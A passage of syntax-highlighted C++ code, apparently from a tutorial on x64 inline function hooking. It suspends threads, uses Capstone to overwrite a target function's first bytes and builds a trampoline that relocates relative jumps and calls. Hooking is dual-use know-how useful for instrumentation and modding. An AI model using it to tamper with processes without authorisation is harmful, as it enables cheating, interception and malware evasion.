<span class="n">HANDLE</span> <span class="n">hSnapshot</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPTHREAD</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hSnapshot</span> <span class="o">!=</span> <span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">THREADENTRY32</span> <span class="n">te</span><span class="p">;</span>
<span class="n">te</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">THREADENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Thread32First</span><span class="p">(</span><span class="n">hSnapshot</span><span class="p">,</span> <span class="o">&</span><span class="n">te</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">do</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">te</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">>=</span> <span class="p">(</span><span class="n">FIELD_OFFSET</span><span class="p">(</span><span class="n">THREADENTRY32</span><span class="p">,</span> <span class="n">th32OwnerProcessID</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">DWORD</span><span class="p">))</span>
<span class="o">&&</span> <span class="n">te</span><span class="p">.</span><span class="n">th32OwnerProcessID</span> <span class="o">==</span> <span class="n">GetCurrentProcessId</span><span class="p">()</span>
<span class="o">&&</span> <span class="n">te</span><span class="p">.</span><span class="n">th32ThreadID</span> <span class="o">!=</span> <span class="n">GetCurrentThreadId</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="kr">thread</span> <span class="o">=</span> <span class="o">::</span><span class="n">OpenThread</span><span class="p">(</span><span class="n">THREAD_ALL_ACCESS</span><span class="p">,</span> <span class="n">FALSE</span><span class="p">,</span> <span class="n">te</span><span class="p">.</span><span class="n">th32ThreadID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="kr">thread</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">suspend</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SuspendThread</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">ResumeThread</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Thread32Next</span><span class="p">(</span><span class="n">hSnapshot</span><span class="p">,</span> <span class="o">&</span><span class="n">te</span><span class="p">));</span>
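<span class="p">}</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hSnapshot</span><span class="p">);</span> <span class="c1">//snapshot handles need to be closed, otherwise they leak</span>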
<span class="p">}</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// turn ON detail feature with CS_OPT_ON</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, the caller needs to free it later with cs_free</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace stolen instructions in target func with NOPs, so that when we jump</span>
<span class="c1">//back to the target function, we don't have to care about how many</span>
<span class="c1">//bytes were stolen</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//a mem operand can be rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span> <span class="c1">//byte offset of the displacement within the instruction</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//relative jump instructions need to be rewritten so that they jump to the appropriate</span>
<span class="c1">//place in the Absolute Instruction Table. Since we want to preserve any conditional</span>
<span class="c1">//jump logic, this func rewrites the instruction's operand bytes only. </span>
<span class="kt">void</span> <span class="nf">RewriteStolenJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//relative call instructions need to be rewritten as jumps to the appropriate</span>
<span class="c1">//place in the Absolute Instruction Table. Since we want to preserve the length</span>
<span class="c1">//of the call instruction, we first replace all the instruction's bytes with 1 byte</span>
<span class="c1">//NOPs, before writing a 2 byte jump to the start</span>
<span class="kt">void</span> <span class="nf">RewriteStolenCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">numNOPs</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="mi">2</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">numNOPs</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go (capstone prints the absolute target address here)</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">dstMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="cm">/*build a "jump - sandwich" style trampoline. This style of trampoline has three sections:
|----------------------------|
|Stolen Instructions |
|----------------------------|
|Jump back to target func |
|----------------------------|
|Absolute Instruction Table |
|----------------------------|
Relative instructions in the stolen instructions section need to be rewritten as absolute
instructions which jump/call to the intended target address of those instructions (since they've
been relocated). Absolute versions of these instructions are added to the absolute instruction
table. The relative instructions in the stolen instructions section get rewritten to relative
jumps to the corresponding instructions in the absolute instruction table.
*/</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteStolenJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteStolenCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
